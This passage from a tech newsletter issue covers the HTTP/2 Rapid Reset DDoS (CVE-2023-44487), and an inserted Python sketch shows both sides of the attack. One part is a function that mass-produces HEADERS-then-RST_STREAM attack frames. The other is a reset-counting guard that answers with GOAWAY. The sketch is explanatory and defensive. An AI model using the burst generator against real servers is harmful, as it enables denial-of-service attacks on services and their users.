The Pulse #67: Okta Schooled on Its Security Practices
Also: the largest DDoS attack to date mitigated; AWS quickly reversed the banning of re:Invent community apps; and advice for engineers considering joining a bootstrapped company.
Today's topics are:
Industry pulse. A roundup of recent events, with commentary. The largest DDoS to date mitigated; a one-year-old AI company worth $500M; a potential L8-L9 slowdown at Google and more.
Okta schooled on security practices – by its own customers. One of Okta’s customers reported a security breach. Okta did nothing. Then, another reported it. Okta still did nothing. 20 days after the first report, Cloudflare – another Okta customer – detected the exact same security breach. How do Okta’s customers have better security processes than Okta, a security-focused company?
AWS swiftly unbans re:Invent scheduling apps. Developers maintaining community websites that help attendees schedule talks at re:Invent (AWS’s annual event) received an unfriendly message telling them to remove all AWS content. AWS leadership reversed the decision within a day, but by then one of the scheduling apps had already complied with the demand and deleted its production database.
Advice for software engineers considering joining a bootstrapped company. Former Lyft software engineer – now the cofounder of the bootstrapped company Friendly Captcha – Guido Zuidhof shares what characteristics he looks for in early hires, and traits that help with thriving in this position.
1. Industry pulse
AWS, Cloudflare, Google, and Microsoft defended against the largest DDoS to date
On 28 August 2023, AWS saw its largest distributed denial of service attack to date, peaking at 155M requests/sec. More attacks followed, hitting different cloud providers through September and October. Cloudflare handled 201M requests/sec (!), and Google said the attack against it peaked at 398 million requests/sec (!!). That is roughly 8x the largest DDoS Google had previously recorded.
What enabled this attack was a zero-day HTTP/2 vulnerability called HTTP/2 Rapid Reset. Here is how Google explains it:
The attack utilized a newly discovered vulnerability with HTTP/2 called Rapid Reset: the attacker sends an RST_STREAM frame immediately after sending a request frame. This cancels the request but leaves the HTTP/2 connection open: which made this attack so efficient.
And this is how requests peaked at 398 million requests per second in just 30 seconds, as visualized by Google:
The major infrastructure providers coordinated a response to this attack vector, and all major cloud providers have since mitigated it on their edges. The vulnerability is tracked as CVE-2023-44487 in the Common Vulnerabilities and Exposures (CVE) database. One caveat for practitioners: the weakness is in the HTTP/2 protocol design rather than in any one vendor’s product, so every HTTP/2 server implementation is affected, and anyone terminating HTTP/2 themselves (web servers, reverse proxies, application frameworks) needed to patch their own stack, not just rely on their cloud provider. Read the summaries on this attack by Google, by AWS, by Cloudflare, and by Azure.
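To make the mechanism concrete, here is an added example that is not from the newsletter or from any of the providers’ write-ups: a Python sketch of both sides of Rapid Reset. The client side builds raw HTTP/2 frames (HEADERS immediately followed by RST_STREAM with the CANCEL error code, per RFC 9113) using a constructed HPACK block; the server side models the mitigation the providers described, counting resets per connection in a sliding window and answering an excess with GOAWAY(ENHANCE_YOUR_CALM). The frame builder, parser, ConnectionGuard class, the 100-resets-per-second threshold and the stepping_clock helper are all my own illustrative choices, not the settings any named implementation uses.

```python
import collections
import struct
import time

# Frame types, flags and error codes from RFC 9113 (HTTP/2), sections 6 and 7.
FRAME_HEADERS = 0x1
FRAME_RST_STREAM = 0x3
FRAME_GOAWAY = 0x7
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
ERR_CANCEL = 0x8
ERR_ENHANCE_YOUR_CALM = 0xB

# Constructed HPACK block: static-table indexes 2 (:method GET), 6 (:scheme http), 4 (:path /).
GET_ROOT_HPACK = b"\x82\x86\x84"


def frame(ftype, flags, stream_id, payload):
    """Serialize one frame: 24-bit length, 8-bit type, 8-bit flags, reserved bit + 31-bit stream id."""
    return (struct.pack("!I", len(payload))[1:]
            + bytes([ftype, flags])
            + struct.pack("!I", stream_id & 0x7FFFFFFF)
            + payload)


def rapid_reset_burst(count, first_stream_id=1, hpack=GET_ROOT_HPACK):
    """Client side of Rapid Reset: each stream is opened with HEADERS and cancelled at once with RST_STREAM."""
    out = bytearray()
    sid = first_stream_id
    for _ in range(count):
        out += frame(FRAME_HEADERS, FLAG_END_HEADERS | FLAG_END_STREAM, sid, hpack)
        out += frame(FRAME_RST_STREAM, 0, sid, struct.pack("!I", ERR_CANCEL))
        sid += 2  # client-initiated stream ids are odd
    return bytes(out)


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) for each complete frame in data."""
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        sid = struct.unpack("!I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) < length:
            break  # truncated frame, wait for more bytes
        yield ftype, flags, sid, payload
        off += 9 + length


class ConnectionGuard:
    """Server-side mitigation (illustrative thresholds): count RST_STREAM frames per connection in a
    sliding window and answer an excess with GOAWAY(ENHANCE_YOUR_CALM) so the connection is closed."""

    def __init__(self, max_resets=100, window_s=1.0, clock=time.monotonic):
        self.max_resets = max_resets
        self.window_s = window_s
        self.clock = clock
        self.reset_times = collections.deque()
        self.active_streams = set()  # opened and not yet reset (responses are not modelled)
        self.peak_active = 0
        self.last_stream_id = 0

    def on_frame(self, ftype, flags, sid, payload):
        """Return GOAWAY bytes when the connection must be torn down, else None."""
        if ftype == FRAME_HEADERS:
            self.active_streams.add(sid)
            self.last_stream_id = max(self.last_stream_id, sid)
            self.peak_active = max(self.peak_active, len(self.active_streams))
        elif ftype == FRAME_RST_STREAM:
            # The reset frees the stream slot immediately, so SETTINGS_MAX_CONCURRENT_STREAMS
            # never bites, while the work already started for that request continues server-side.
            self.active_streams.discard(sid)
            now = self.clock()
            self.reset_times.append(now)
            while self.reset_times and now - self.reset_times[0] > self.window_s:
                self.reset_times.popleft()
            if len(self.reset_times) > self.max_resets:
                payload = struct.pack("!II", self.last_stream_id, ERR_ENHANCE_YOUR_CALM)
                return frame(FRAME_GOAWAY, 0, 0, payload)
        return None


def serve(data, guard):
    """Feed a byte stream through the guard; report how far it got and whether the connection was closed."""
    processed = 0
    for f in parse_frames(data):
        processed += 1
        goaway = guard.on_frame(*f)
        if goaway is not None:
            return {"goaway": goaway, "frames_processed": processed, "peak_active": guard.peak_active}
    return {"goaway": None, "frames_processed": processed, "peak_active": guard.peak_active}


def stepping_clock(step_s):
    """Deterministic clock for experiments: advances by step_s on every call."""
    t = [0.0]

    def clock():
        t[0] += step_s
        return t[0]
    return clock


if __name__ == "__main__":
    # 150 request/reset pairs arriving in the same instant: the guard trips on the 101st reset.
    result = serve(rapid_reset_burst(150), ConnectionGuard(clock=lambda: 0.0))
    print(result["frames_processed"], result["peak_active"], result["goaway"].hex())
```

Two things the run makes visible. First, peak_active stays at 1 no matter how many pairs are sent, which is exactly why the usual per-connection concurrency limit does not stop the attack. Second, the same burst spread out in time (the stepping_clock case) never trips the guard, so the window and threshold are what decide between blocking an attacker and cutting off a legitimate client that cancels many requests; real implementations picked their own values.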
GitHub Copilot has more than 1M paying customers
It was two weeks ago that GitHub announced Copilot had passed $100M in annual revenue run rate. This week, Microsoft CEO Satya Nadella announced on Microsoft’s earnings call: